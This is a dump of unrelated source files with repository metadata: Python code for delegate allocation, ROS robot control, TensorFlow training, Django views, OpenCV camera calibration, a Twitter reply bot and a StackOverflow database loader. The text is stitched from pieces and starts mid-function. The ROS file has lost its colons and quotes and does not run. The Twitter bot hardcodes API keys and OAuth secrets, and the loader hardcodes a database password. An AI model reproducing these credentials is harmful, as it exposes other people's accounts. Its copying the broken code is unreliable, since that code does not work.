return DelList
else:
DelList[cand[0]] = total_dels / 3
DelList[cand[1]] = total_dels / 3
DelList[cand[2]] = total_dels / 3
return DelList
else: # At-large rules
#topbonus is Georgia rule, giving top vote getter 3 at-large dels
topbonus = 0
if 'topvotedelbonus' in rules:
topbonus = rules['topvotedelbonus']
total_dels = total_dels - topbonus
pollsum = sum(x[1] for x in pollorder[0:alloc_split])
sumdels = 0
# proportional among the candidates who qualify. We use rounding and then
# addition of delegates if needed. There are variations in rounding (we ignore).
for i in range(alloc_split):
DelList[cand[i]] = round((poll[i] / pollsum) * total_dels)
sumdels += round((poll[i] / pollsum) * total_dels)
#print i, cand[i], poll[i], DelList[cand[i]],sumdels, pollsum,
# print round((poll[i] / pollsum) * total_dels), topbonus
remainingdels = int(total_dels - sumdels)
DelList[cand[0]] += topbonus
for i in range(remainingdels):
DelList[cand[i]] += 1
return DelList
#CandPoll is a state poll
def alloc_delegates(self, state_code, state_rule, statewide_poll, cd_rule, state_polls):
delslist = {}
pollorder = sorted(statewide_poll.items(), key=itemgetter(1), reverse=True)
if state_rule['allocbycd'] == True:
num_cds = cd_rule['numdistricts']
dels_per_cd = cd_rule['numdelegates']
cd_dels = dels_per_cd * num_cds
else:
cd_dels = num_cds = dels_per_cd = 0
print "\nState of", state_rule['state'], "delegates:", cd_dels , "delegates in CDs and", state_rule['numdelegates'], "at-large delegates,",
print cd_dels + state_rule['numdelegates'], "total delegates."
# state delegate allocations
print pollorder
delswon = self.delegate_alloc(state_rule, pollorder)
delslist[state_code]=delswon
# Do we allocate by CDs?
if state_rule['allocbycd']==True:
print "Alloc by CD for ", num_cds, "districts"
for i in range(1,num_cds+1):
loc = state_code + "CD" + str(i)
if loc in state_polls:
print loc, 'found in state poll'
cdpollorder = sorted(state_polls[loc].items(), key=itemgetter(1), reverse=True)
else: # use statewide poll if there is no CD poll
print "no CD poll found for", loc, "in", state_polls
cdpollorder = pollorder
print cdpollorder
delswon = self.delegate_alloc(cd_rule, cdpollorder)
delslist[loc]=delswon
else:
print "No allocation by CD for", state_rule['state']
print delslist
Sum = {i:0 for i in statewide_poll}
for result in delslist:
#print result
for cand in delslist[result]:
Sum[cand] += delslist[result][cand]
print state_rule['state'], "delegates awarded:", Sum
return delslist
| [
"patmcguinness.phd@gmail.com"
] | patmcguinness.phd@gmail.com |
88d05efddc975407fb314b5486c42ded026b9c49 | 16c4ab33348361916ac99566a3de8a9c08c8ffc5 | /extra_apps/__init__.py | b8c8a59f4167fd637e987389ed883bc06fd623c7 | [
"Apache-2.0"
] | permissive | Palameng/ProjectSupportingSystem | bf4dc3d7212507b1abbed5d50c86150d465742ef | 8f9be803b1d2bbac0e32adf1b5ad4808e26503ae | refs/heads/master | 2021-09-05T15:48:34.667035 | 2018-01-29T12:12:54 | 2018-01-29T12:12:54 | 103,030,597 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 76 | py | # -*- coding: utf-8 -*-
__author__ = 'mengyuan'
__date__ = '2017/9/11 12:05' | [
"506357902@qq.com"
] | 506357902@qq.com |
549ad5623bc23154c244901bbf465508ae483cf7 | fdc751232f7e1bdf7d0afc12f9b11e8b5f7fd3ae | /move/src/test_ctrl_class.py | a4aeccfb00203d34dc9e49554206588a07c92009 | [] | no_license | tianyaoh/patrolling_basic | 615d48ecdeda89465e41c63c3ee7476b3083fa09 | ebdd7be15773da6c896a9fd904f80933b83b4114 | refs/heads/main | 2023-04-19T12:44:58.003513 | 2021-05-10T16:03:12 | 2021-05-10T16:03:12 | 340,202,479 | 0 | 0 | null | 2021-05-10T16:04:06 | 2021-02-18T23:14:28 | Python | UTF-8 | Python | false | false | 4,301 | py | #!usrbinenv python
import rospy
from geometry_msgs.msg import Twist
import time
# rospy.init_node('move_forward_publisher')
# frw_pub = rospy.Publisher('cmd_vel', Twist, queue_size=1)
# starting_time = rospy.Time.now()
# while not rospy.is_shutdown()
# twist = Twist()
# twist.linear.x = 0.2
# frw_pub.publish(twist)
class BotControl()
def __init__(self,robot_name = turtlebot)
# initializing python as node
rospy.init_node('control_node')
# print to console
rospy.loginfo(This is turtlebot at your command)
# topic,msg_type,publisher, &subscriber
self.cmd_vel_topic = cmd_vel
self.cmd = Twist()
self.front_scan_topic = 'frontscan'
self.back_scan_topic = 'backscan'
self.right_scan_topic = 'rightscan'
self.left_scan_topic = 'leftscan'
# start publisher
self.cmd_publisher = rospy.Publisher('cmd_vel', Twist, queue_size=1)
# coordinate disposition
self.disposition = {disp_lx0,disp_ly0,disp_lz0,disp_ax0,disp_ay0,disp_az0}
# This is the state of motion, boolean
# now in_motion, not_in_motion
# future moving,airborne,sliping,sinking,rolling
self.moving = False
# self_stop
self.rate = rospy.Rate(1)
def move_straight_for_x(self,speed,direction,time)
# ensuring positvity for speed
speed = abs(speed)
# rospy.loginfo(initial speed %s,speed)
if direction == 'backward'
speed = -speed
i = 0
self.moving = True
# loop to publish the velocity estimate, current_distance = velocity (t1 - t0)
while (i = time)
# Publish the velocity
self.motion(lx = speed)
i += 1
self.rate.sleep()
self.stop()
def move_straight(self,speed,direction='forward')
# ensuring positvity for speed
speed = abs(speed)
# rospy.loginfo(initial speed %s,speed)
if direction == 'backward'
speed = -speed
# publishing velocity
self.motion(lx = speed)
self.moving = True
def turn_time(self,direction,speed,time)
speed = abs(speed)
if direction == 'counter_clockwise'
speed = -speed
i = 0
self.moving = True
# loop to publish the velocity estimate, current_distance = velocity (t1 - t0)
while (i = time)
# Publish the velocity
self.motion(az = speed)
i += 1
self.rate.sleep()
self.stop()
def turn(self,direction,speed)
speed = abs(speed)
if direction == 'counter_clockwise'
speed = -speed
self.motion(az = speed)
def publish_once_in_cmd_vel(self)
# This function is taken from the Python-Robotic class from Construct.com
# From the 4th chapter about function, under the class bot_control, function publish_once in cmd_vel
# There is little change for variable names but structure is kept as original.
while not rospy.is_shutdown()
connections = self.cmd_publisher.get_num_connections()
if connections 0
self.cmd_publisher.publish(self.cmd)
#rospy.loginfo(Cmd Published)
break
else
self.rate.sleep()
# privat function should only be used internally
def motion(self,lx = 0,ly =0,lz = 0,ax = 0,ay = 0,az = 0)
# updateing cmd
self.cmd.linear.x = lx
self.cmd.linear.y = ly
self.cmd.linear.z = lz
self.cmd.angular.x = ax
self.cmd.angular.y = ay
self.cmd.angular.z = az
# rospy.loginfo(lx = %s ly = %s lz = %s ax = %s ay = %s az = %s ,lx,ly,lz,ax,ay,az)
# publishing in ignorance of connection
self.publish_once_in_cmd_vel()
self.moving = True
def move_towards_x_y(x,y)
pass
# write action client
# def distance_in_theory(x_axis,speed,t1,t2)
# temp = speedabs(abs(t1)-abs(t2))
# self.disposition[x_axis] += temp
# return temp
def stop(self)
self.motion()
self.moving = False
# rospy.loginfo(Bot internally not in motion)
| [
"65034293+tianyaoh@users.noreply.github.com"
] | 65034293+tianyaoh@users.noreply.github.com |
6110d7d86503b01878af17b0f37d98e5097fece2 | f4b7d327581e500dc79079c834cc23af9939737e | /moonlight/models/base/glyph_patches.py | 263b33c17cd0a8a9c7f22e54295ce5b1953d0b75 | [
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] | permissive | abc3436645/moonlight | 095eea2b892528b9a3fe5d05af39e4a023c55628 | 7f8a3ab4e55570dd120e3965f8049dd866d12a6b | refs/heads/master | 2020-03-25T19:37:01.849371 | 2018-08-07T17:42:56 | 2018-08-07T17:42:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,031 | py | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Base patch-based glyph model.
For example, this accepts the staff patch k-means centroids emitted by
staffline_patches_kmeans_pipeline and labeled by kmeans_labeler.
This defines the input and signature of the model, and allows any type of
multi-class classifier using the normalized patches as input.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
from absl import flags
from moonlight.models.base import batches
from moonlight.models.base import label_weights
from moonlight.util import memoize
import tensorflow as tf
from tensorflow.python.lib.io import file_io
from tensorflow.python.lib.io import tf_record
WEIGHT_COLUMN_NAME = 'weight'
FLAGS = flags.FLAGS
flags.DEFINE_string(
'train_input_patches', None, 'Glob of labeled patch TFRecords for training')
flags.DEFINE_string(
'eval_input_patches', None, 'Glob of labeled patch TFRecords for eval')
flags.DEFINE_string('model_dir', None, 'Output trained model directory')
flags.DEFINE_boolean(
'use_included_label_weight', False,
'Whether to multiply a "label_weight" feature included in the example by'
' the weight determined by the "label" value.')
flags.DEFINE_float(
'augmentation_x_shift_probability', 0.5,
'Probability of shifting the patch left or right by one pixel. The edge is'
' filled using the adjacent column. It is equally likely that the patch is'
' shifted left or right.')
flags.DEFINE_float(
'augmentation_max_rotation_degrees', 2.,
'Max rotation of the patch, in degrees. The rotation is selected uniformly'
' randomly from the range +- this value. A value of 0 implies no rotation.')
flags.DEFINE_integer(
'eval_throttle_secs', 60, 'Evaluate at at most this interval, in seconds.')
flags.DEFINE_integer(
'train_max_steps', 100000,
'Max steps for training. If 0, will train until the process is'
' interrupted.')
flags.DEFINE_integer('eval_steps', 500, 'Num steps to evaluate the model.')
flags.DEFINE_integer(
'exports_to_keep', 10,
'Keep the last N saved models (exported on each eval) before deleting'
' previous exports.')
@memoize.MemoizedFunction
def read_patch_dimensions():
"""Reads the dimensions of the input patches from disk.
Parses the first example in the training set, which must have "height" and
"width" features.
Returns:
Tuple of (height, width) read from disk, using the glob passed to
--train_input_patches.
"""
for filename in file_io.get_matching_files(FLAGS.train_input_patches):
# If one matching file is empty, go on to the next file.
for record in tf_record.tf_record_iterator(filename):
example = tf.train.Example.FromString(record)
# Convert long (int64) to int, necessary for use in feature columns in
# Python 2.
patch_height = int(example.features.feature['height'].int64_list.value[0])
patch_width = int(example.features.feature['width'].int64_list.value[0])
return patch_height, patch_width
def input_fn(input_patches):
"""Defines the estimator input function.
Args:
input_patches: The input patches TFRecords pattern.
Returns:
A callable. Each invocation returns a tuple containing:
* A dict with a single key 'patch', and the patch tensor as a value.
* A scalar tensor with the patch label, as an integer.
"""
patch_height, patch_width = read_patch_dimensions()
dataset = tf.data.TFRecordDataset(file_io.get_matching_files(input_patches))
def parser(record):
"""Dataset parser function.
Args:
record: A single serialized Example proto tensor.
Returns:
A tuple of:
* A dict of features ('patch' and 'weight')
* A label tensor (int64 scalar).
"""
feature_types = {
'patch':
tf.FixedLenFeature((patch_height, patch_width), tf.float32),
'label':
tf.FixedLenFeature((), tf.int64),
}
if FLAGS.use_included_label_weight:
feature_types['label_weight'] = tf.FixedLenFeature((), tf.float32)
features = tf.parse_single_example(record, feature_types)
label = features['label']
weight = label_weights.weights_from_labels(label)
if FLAGS.use_included_label_weight:
# Both operands must be the same type (float32).
weight = tf.to_float(weight) * tf.to_float(features['label_weight'])
patch = _augment(features['patch'])
return {'patch': patch, WEIGHT_COLUMN_NAME: weight}, label
return batches.get_batched_tensor(dataset.map(parser))
def _augment(patch):
"""Performs multiple augmentations on the patch, helping to generalize."""
return _augment_rotation(_augment_shift(patch))
def _augment_shift(patch):
"""Augments the patch by possibly shifting it 1 pixel horizontally."""
with tf.name_scope('augment_shift'):
rand = tf.random_uniform(())
def shift_left():
return _shift_left(patch)
def shift_right():
return _shift_right(patch)
def identity():
return patch
shift_prob = min(1., FLAGS.augmentation_x_shift_probability)
return tf.cond(rand < shift_prob / 2,
shift_left,
lambda: tf.cond(rand < shift_prob, shift_right, identity))
def _shift_left(patch):
patch = tf.convert_to_tensor(patch)
return tf.concat([patch[:, 1:], patch[:, -1:]], axis=1)
def _shift_right(patch):
patch = tf.convert_to_tensor(patch)
return tf.concat([patch[:, :1], patch[:, :-1]], axis=1)
def _augment_rotation(patch):
"""Augments the patch by rotating it by a small amount."""
max_rotation_radians = math.radians(FLAGS.augmentation_max_rotation_degrees)
rotation = tf.random_uniform(
(), minval=-max_rotation_radians, maxval=max_rotation_radians)
# Background is white (1.0) but tf.contrib.image.rotate currently always fills
# the edges with black (0). Invert the patch before rotating.
return 1. - tf.contrib.image.rotate(
1. - patch, rotation, interpolation='BILINEAR')
def serving_fn():
"""Returns the ServingInputReceiver for the exported model.
Returns:
A ServingInputReceiver object which may be passed to
`Estimator.export_savedmodel`. A model saved using this receiver may be used
for running OMR.
"""
examples = tf.placeholder(tf.string, shape=[None])
patch_height, patch_width = read_patch_dimensions()
parsed = tf.parse_example(examples, {
'patch': tf.FixedLenFeature((patch_height, patch_width), tf.float32),
})
return tf.estimator.export.ServingInputReceiver(
features={'patch': parsed['patch']},
receiver_tensors=parsed['patch'],
receiver_tensors_alternatives={
'example': examples,
'patch': parsed['patch']
})
def create_patch_feature_column():
return tf.feature_column.numeric_column(
'patch', shape=read_patch_dimensions())
def train_and_evaluate(estimator):
tf.estimator.train_and_evaluate(
estimator,
tf.estimator.TrainSpec(
input_fn=lambda: input_fn(FLAGS.train_input_patches),
max_steps=FLAGS.train_max_steps),
tf.estimator.EvalSpec(
input_fn=lambda: input_fn(FLAGS.eval_input_patches),
start_delay_secs=0,
throttle_secs=FLAGS.eval_throttle_secs,
steps=FLAGS.eval_steps,
exporters=[
tf.estimator.LatestExporter(
'exporter', serving_fn,
exports_to_keep=FLAGS.exports_to_keep),
]))
| [
"ringwalt@google.com"
] | ringwalt@google.com |
f4cda7cfbff10e6395f8d6e6c27990edd2b63bb6 | 21f62465e981dcd4f9008845bc8882420a19a13e | /catalog/views.py | 9cdf7c07f8cf8025d4c2c40d7b4da82a6180a00b | [] | no_license | M-Pidlisnyi/carrent | 7674c51e170d64ef96960ffd708e43207c7ff54a | af169086db515cf50ead3bfec4fab5e968f1de96 | refs/heads/main | 2023-08-21T01:51:57.105224 | 2021-10-31T14:39:54 | 2021-10-31T14:39:54 | 404,853,562 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,661 | py | from django.db import connection
from django.shortcuts import render
from django.views import generic
from django.views.generic.edit import ModelFormMixin
from django.contrib.auth.mixins import LoginRequiredMixin
from .models import BodyStyle, Brand, Car, CarInstance
# Create your views here.
def index(request):
"""view function form home page"""
carNum = Car.objects.all().count()
instancesNum = CarInstance.objects.all().count()
availableInstances = CarInstance.objects.filter(status__exact='a').count()
brandNum = Brand.objects.all().count()
visits_num = request.session.get('visits_num', 0)
request.session['visits_num'] = visits_num + 1
context = {
'carNum': carNum,
'instancesNum': instancesNum,
'availableInstances': availableInstances,
'brandNum': brandNum,
'visits_num': visits_num
}
# Render the HTML template index.html with the data in the context variable
return render(request, 'index.html', context=context)
class CarListView(generic.ListView):
model = Car
paginate_by = 5
class CarDetailView(generic.DetailView):
model = Car
class BrandListView(generic.ListView):
model = Brand
paginate_by = 5
class BrandDetailView(generic.DetailView):
model = Brand
class OnRentView(LoginRequiredMixin, generic.ListView):
"""Generic class-based view listing cars on rent to current user."""
model = CarInstance
template_name ='catalog/on_rent_view.html'
paginate_by = 5
def get_queryset(self):
return CarInstance.objects.filter(renter=self.request.user).filter(status__exact="o").order_by("due_back") | [
"mishapropatriot@gmail.com"
] | mishapropatriot@gmail.com |
0bd393951e50fc60477ac924c0d63f8423b99e55 | fd7adeb6292d397e6ff2a599184caba4764b7a07 | /type_demo.py | 805d6356d70be9c735014abe30dbf8c207c7eb9b | [] | no_license | anajera10/mis3640 | 6614dc1df7cbd96986aae5d25ce779a140c5f853 | b3f0e809e521959184ee58473a92968db3058b69 | refs/heads/master | 2020-07-15T11:52:07.948211 | 2016-10-03T02:42:55 | 2016-10-03T02:42:55 | 67,155,427 | 1 | 1 | null | 2016-10-04T22:10:13 | 2016-09-01T18:17:57 | Python | UTF-8 | Python | false | false | 280 | py | import time
print(time.time())
current=time.time()
seconds=current//60
minutes = (current//60) % 60
hours = (current//60)//60 %24
days = current//60//60//24
print('Current time: %d days, %d hours, %d minutes and %d seconds from Epoch.' % (days,hours,minutes,seconds))
| [
"anajera1@babson.edu"
] | anajera1@babson.edu |
cde0aad40d03ea9899b0f744cc12725d618b2812 | 7cfcc4bf9b2d63240615719e2b81759710e17cb5 | /twitter_bot.py | 773739d7beb90349bd08e581d0d7d965ef3d007d | [] | no_license | r3glus/4app | c168ea5cc682f74d28b0ec337a7a4dfdc24b156b | 60b7cb6578f426af1ffafbb134b8de9824e204f9 | refs/heads/master | 2020-12-05T16:38:16.149438 | 2020-03-18T15:58:01 | 2020-03-18T15:58:01 | 232,175,214 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,517 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import random
import time
import gspread
import schedule
from oauth2client.service_account import ServiceAccountCredentials
from twython import Twython, TwythonError, TwythonStreamer
print("Listening for tweets containing the hashtag")
APP_KEY = "kau0g8qYQtMRK0w41GXoSayx0"
APP_SECRET = "jY6W7tWzJKCwpPJylbC46YS4kKluck9nLMaAmZlHuxYte1ce8n"
OAUTH_TOKEN = "1141000476206481408-G8Buwan7GPbXegsL63TJ8r2MaNFjYZ"
OAUTH_TOKEN_SECRET = "DJzTQWyP6K5pOPg3mNbF5wSNOovmNs9v8gXaBziOjniu6"
def twitter_api():
""" Authenticate credentials"""
twitter = Twython(APP_KEY, APP_SECRET, OAUTH_TOKEN, OAUTH_TOKEN_SECRET)
return twitter
def spreadsheet():
scope = ['https://spreadsheets.google.com/feeds',
'https://www.googleapis.com/auth/drive']
creds = ServiceAccountCredentials.from_json_keyfile_name(
'Reglus-bot.json', scope)
client = gspread.authorize(creds)
sheet = client.open("Reglus Heroku").sheet1
return sheet
def get_all_records():
sheet = spreadsheet()
return sheet.get_all_records()
def get_fake_news_url():
sheet = spreadsheet()
records = sheet.get_all_records()
urls = [url.get('FAKE NEWS URL') for url in records]
print(urls)
return urls
def reply(data):
api = twitter_api()
all_records = get_all_records()
handle = data.get('user').get('screen_name')
fake_news_url = data.get('entities').get('urls')[0].get('url')
for record in all_records:
if fake_news_url in record.values():
reply_text = "Olá @{handle} O link que você compartilhou não parece ser uma notícia verdadeira! Verifique este link {record.get('DEBUNKING')}"
break
try:
tweet_id = data.get('id')
time.sleep(2)
api.update_status(status=reply_text, in_reply_to_status_id=tweet_id)
print("Tweet successfully sent!")
time.sleep(1)
except TwythonError as e:
print(e)
class MyStreamer(TwythonStreamer):
def on_success(self, data):
tweetText = data.get('text')
print(tweetText)
reply(data)
def on_error(self, status_code, data):
print("Twitter Error Status code", status_code)
# self.disconnect()
stream = MyStreamer(APP_KEY, APP_SECRET,
OAUTH_TOKEN, OAUTH_TOKEN_SECRET)
links = get_fake_news_url()
stream.statuses.filter(track=links)
| [
"noreply@github.com"
] | r3glus.noreply@github.com |
e8c4fe4fed8dad5083d035e6827ae056a6b8a943 | 739972eef4848f757b42acf2e29ebfe94a00d57b | /build/learning_service/catkin_generated/pkg.installspace.context.pc.py | 2167ee1ea8e826d2ab4ad97080a496b84a503ea8 | [] | no_license | sxs505/Logistics-car-rplidar | 5a01b5bc256de350579d41b87dc1d0c8da18c5c0 | 0baa4c7dd4e12f2df4a3b0434afbd4aeab7b94c9 | refs/heads/main | 2023-04-03T10:48:53.566195 | 2021-04-14T03:16:49 | 2021-04-14T03:16:49 | 338,500,084 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 389 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "learning_service"
PROJECT_SPACE_DIR = "/home/pathfinder/catkin_rplidar/install"
PROJECT_VERSION = "0.0.0"
| [
"51873335+sxs505@users.noreply.github.com"
] | 51873335+sxs505@users.noreply.github.com |
1c826dd9083be24361ca5ba352a9ebe31ae329f1 | fced880ea501c2eb69edbf9f9ee8286f3a6f3899 | /account/urls.py | 9e8fc581091e0872f0695627f7c88d28bf65e985 | [] | no_license | Oluwaniphise/Qna | 37cd3919bd0d5d09e6854d8af4a3f92a9ca06014 | c43976f73f3133fe0f7a03b5f333a2c85f1d0f4c | refs/heads/master | 2023-04-26T13:44:38.786201 | 2020-11-30T08:22:02 | 2020-11-30T08:22:02 | 308,851,239 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 396 | py | from django.urls import path
from . import views
from django.contrib.auth import views as auth_views
urlpatterns = [
path('registration/', views.register, name='register'),
path('login/', views.user_login, name="login"),
path('logout/', auth_views.LogoutView.as_view(template_name="account/logout.html"), name='logout'),
path('dashboard/', views.dashboard, name="dashboard"),
] | [
"oduyaleenoch@gmail.com"
] | oduyaleenoch@gmail.com |
04b61e88739ffadc8d675c0b4f576b5f7122eb69 | 576cc83449e10fd3f98281970c46016ea7a5aea2 | /OpenCV相机标定/CalibrationTest.py | 658370ca975416804ff63dff37187d3bdaa30be3 | [] | no_license | HotView/PycharmProjects | 215ab9edd341e3293daebcf86d97537f8cd28d75 | 61393fe5ba781a8c1216a5cbe7e0d06149a10190 | refs/heads/master | 2020-06-02T07:41:53.608742 | 2019-11-13T08:31:57 | 2019-11-13T08:31:57 | 191,085,178 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,778 | py | import cv2
import numpy as np
import glob
# termination criteria
criteria = (cv2.TERM_CRITERIA_EPS+cv2.TERM_CRITERIA_MAX_ITER,30,0.001)
# prepare objects points,like(0,0,0),(1,0,0),(2,0,0),....,(6,5,0)
objp = np.zeros((6*7,3),np.float32)
objp[:,:2] = np.mgrid[0:7,0:6].T.reshape(-1,2)
# Arrays to store object points and points from all the images.
objpoints = []
imgpoints = []
images = glob.glob('image/*.jpg')
for fname in images:
img = cv2.imread(fname)
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
#Find the chess board coners,按照行或者列连接,(7,6)就是7个连成一条线
ret,corners = cv2.findChessboardCorners(gray,(7,6),None)
#如果找出了角点,添加对象点和图像点
if ret:
objpoints.append(objp)
corners2 = cv2.cornerSubPix(gray,corners,(11,11),(-1,-1),criteria)
print("corners2",corners2)
imgpoints.append(corners2)
#绘制和展示角点,按照颜色来进行划分(7,6),6种颜色
#橙红色的为0号点,蓝色的为最后的点集
img = cv2.drawChessboardCorners(img,(7,6),corners2,ret)
for i,p in enumerate(corners2):
x = int(p[0][0])
y = int(p[0][1])
cv2.putText(img,str(i),(x,y),cv2.FONT_HERSHEY_SIMPLEX,0.5,(255,255,255),2)
cv2.imshow(fname,img)
rmse, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, gray.shape[::-1], None, None)
h,w = gray.shape[:2]
imgsize = (w,h)
mtx2, roi=cv2.getOptimalNewCameraMatrix(mtx,dist,imgsize,alpha=0,
centerPrincipalPoint=True)
print("#######")
print(dist)
#np.savez("pose",mtx = mtx,dist = dist,newmtx = mtx2)
print(mtx,dist,mtx2)
with open('pose.py', 'wb') as fout:
fout.write(b'import numpy as np\n')
fout.write(b'\n')
fout.write(b'rmse = %r\n' % rmse)
fout.write(b'distortion_coefficients = np.array(%r, dtype=np.float32)\n'
% dist.tolist())
fout.write(b'raw_camera_matrix = np.array(%r, dtype=np.float32)\n'
% mtx.tolist())
fout.write(b'undistort_camera_matrix = np.array(%r, dtype=np.float32)\n'
% mtx2.tolist())
fout.write(b'roi = %d, %d, %d, %d\n'% roi)
fout.write(b'image_size = %d, %d\n' % imgsize)
print(roi)
print("----------------")
print(ret)
print("-----------")
print(mtx)
print("-----------")
matinv = np.linalg.inv(mtx)
print(matinv)
print("################################")
print(np.dot(mtx,matinv))
mean_error = 0
for i in range(len(objpoints)):
imgpoints2, _ = cv2.projectPoints(objpoints[i], rvecs[i], tvecs[i], mtx, dist)
error = cv2.norm(imgpoints[i],imgpoints2, cv2.NORM_L2)/len(imgpoints2)
mean_error += error
print ("total error: ", mean_error/len(objpoints))
cv2.waitKey(0)
| [
"864773190@qq.com"
] | 864773190@qq.com |
ad3d49da1f96ec35902d7ff0d230fa6096b9aa03 | 6e02de993bb3b732917e050ce5b1def91d8793e5 | /chapter5/P06.py | ee13034b44b08062322f63dccc441a645e018670 | [] | no_license | AKATSUKIKOJYO/MyPython | 0d7d9047ef8ead500e478d14eed8f6ed7ef61499 | 4ab35c46972fc77a6b8af0410061a84e53e5b55c | refs/heads/master | 2020-04-11T15:12:36.996625 | 2018-12-29T07:53:59 | 2018-12-29T07:53:59 | 161,883,486 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 209 | py | year = int(input("연도를 입력하세요:" ))
if year % 4 == 0 and year % 100 !=0 or year % 400 == 0:
print ("입력한", year, "는 윤년입니다.")
else:
print("윤년이 아닙니다.")
| [
"noreply@github.com"
] | AKATSUKIKOJYO.noreply@github.com |
3213770d3cda61d88024781056c3c6c001116e1f | c4cd7c5971c4b889d638fe70c52c53a5800b1bfa | /NS3-Assignment/plot/plot2c.py | 2b90f96bf1c86dbfed6a42542038bd0deeee8bc9 | [] | no_license | AkshitKumar/EE5150 | 59893f9c5efc61e75328872364d4e7a2cde7ad3f | 806fe73cb939e9766dad58c3a3de93390bece595 | refs/heads/master | 2021-09-15T04:02:11.903235 | 2018-05-25T09:42:48 | 2018-05-25T09:42:48 | 102,965,182 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 435 | py | import matplotlib.pyplot as plt
import numpy as np
data = np.loadtxt('../data/distance.txt')
data = np.transpose(data)
y_axis = data[1]
x_axis = data[0]
plt.figure()
plt.plot(x_axis,y_axis,x_axis,y_axis,'bx')
plt.xticks(x_axis)
plt.xlabel(r'Distance between AP and Client (in meters)')
plt.ylabel(r'Throughput (in Mbps)')
plt.title(r'Throughtput for different values of distance between AP and client for TCP')
plt.grid()
plt.show() | [
"akshitkumar100@gmail.com"
] | akshitkumar100@gmail.com |
86dbc216f00b25140e5fd984ac271fd810b3caec | b1270c4179f18f83edcf8be7720454614a551b45 | /so_RQ/code/lib/load_data.py | e67ad6c7d521ab3866cca71c0f0a88ad1ad0fae1 | [] | no_license | WISDelft/SODA | f3e4059a2f41cb0cd0516215bcddf62f62683505 | 04484b34d4f25999b515e3fb239850c0bdae7ccd | refs/heads/master | 2021-01-17T08:53:39.159344 | 2015-02-03T13:51:45 | 2015-02-03T13:51:45 | 17,405,793 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,888 | py | import string
import psycopg2
import sys
import pickle
import os
import numpy as np
import copy
con = None
con = psycopg2.connect(database='stackquestionstest', user='postgres', password='wistudelft')
cur = con.cursor()
cur.execute('SELECT version()')
ver = cur.fetchone()
'''
load training data
'''
def load_train_data(option='na'):
at_NoAnswer = dict([])
at_NoVotes = dict([])
at_MEC_quantities = dict([])
at_NoComment_q = dict([])
at_NoCommentVotes_q = dict([])
at_NoComment_a = dict([])
at_NoCommentVotes_a = dict([])
## export the data from database
if option=='train':
cur.execute("select id from questions where TO_CHAR (creationdate,'YYYY-MM-DD') < '2012-07-01'")
else:
cur.execute("select id from questions where TO_CHAR (creationdate,'YYYY-MM-DD') < '2013-01-01'")
results = cur.fetchall()
'''for rs in results:
qid = rs[0]
if qid == None:
continue
##### activeness, expertise #####
if option=='train':
cur.execute("select aowneruserid, ascore, qtags from sim_qa where qid = "+str(qid)+" and TO_CHAR (acreationdate,'YYYY-MM-DD') < '2012-07-01'")
else:
cur.execute("select aowneruserid, ascore, qtags from sim_qa where qid = "+str(qid)+" and TO_CHAR (acreationdate,'YYYY-MM-DD') < '2013-01-01'")
aresults = cur.fetchall()
if aresults == None or len(aresults) ==0:
continue
qtags = []
try:
for t in aresults[0][2].split('|'):
qtags.append(t)
except:
print aresults
if len(qtags) == 0:
continue
mec_quantities = []
for ar in aresults:
ascore = ar[1]
aowneruserid = ar[0]
mec_quantities.append([aowneruserid, ascore])
for t in qtags:
if (aowneruserid, t) in at_NoAnswer:
at_NoAnswer[(aowneruserid, t)] += 1
at_NoVotes[(aowneruserid, t)] += ascore
else:
at_NoAnswer[(aowneruserid, t)] = 1
at_NoVotes[(aowneruserid, t)] = ascore
mec_quantities = sorted(mec_quantities, key = lambda mec_quantities : mec_quantities[1], reverse=True)
rank = 1
for mq in mec_quantities:
aowneruserid = mq[0]
for t in qtags:
if (aowneruserid, t) in at_MEC_quantities:
at_MEC_quantities[(aowneruserid, t)].append([rank,len(mec_quantities)])
else:
at_MEC_quantities[(aowneruserid, t)] = [[rank,len(mec_quantities)]]
rank += 1'''
for rs in results:
qid = rs[0]
if qid == None:
continue
##### participation #####
if option=='train':
cur.execute("select cuserid, cscore, qtags from sim_cqa where qid = "+str(qid)+" and cuserid <> qowneruserid and cuserid<>aowneruserid and TO_CHAR (ccreationdate,'YYYY-MM-DD') < '2012-07-01'")
else:
cur.execute("select cuserid, cscore, qtags from sim_cqa where qid = "+str(qid)+" and cuserid <> qowneruserid and cuserid<>aowneruserid and TO_CHAR (ccreationdate,'YYYY-MM-DD') < '2013-01-01'")
caresults = cur.fetchall()
if caresults == None or len(caresults) ==0:
continue
qtags = []
try:
for t in caresults[0][2].split('|'):
qtags.append(t)
except:
print caresults
if len(qtags) == 0:
continue
for car in caresults:
cascore = car[1]
if cascore == None:
cascore = 0
causerid = car[0]
for t in qtags:
if (causerid, t) in at_NoComment_a:
at_NoComment_a[(causerid, t)] += 1
at_NoCommentVotes_a[(causerid, t)] += cascore
else:
at_NoComment_a[(causerid, t)] = 1
at_NoCommentVotes_a[(causerid, t)] = cascore
for rs in results:
qid = rs[0]
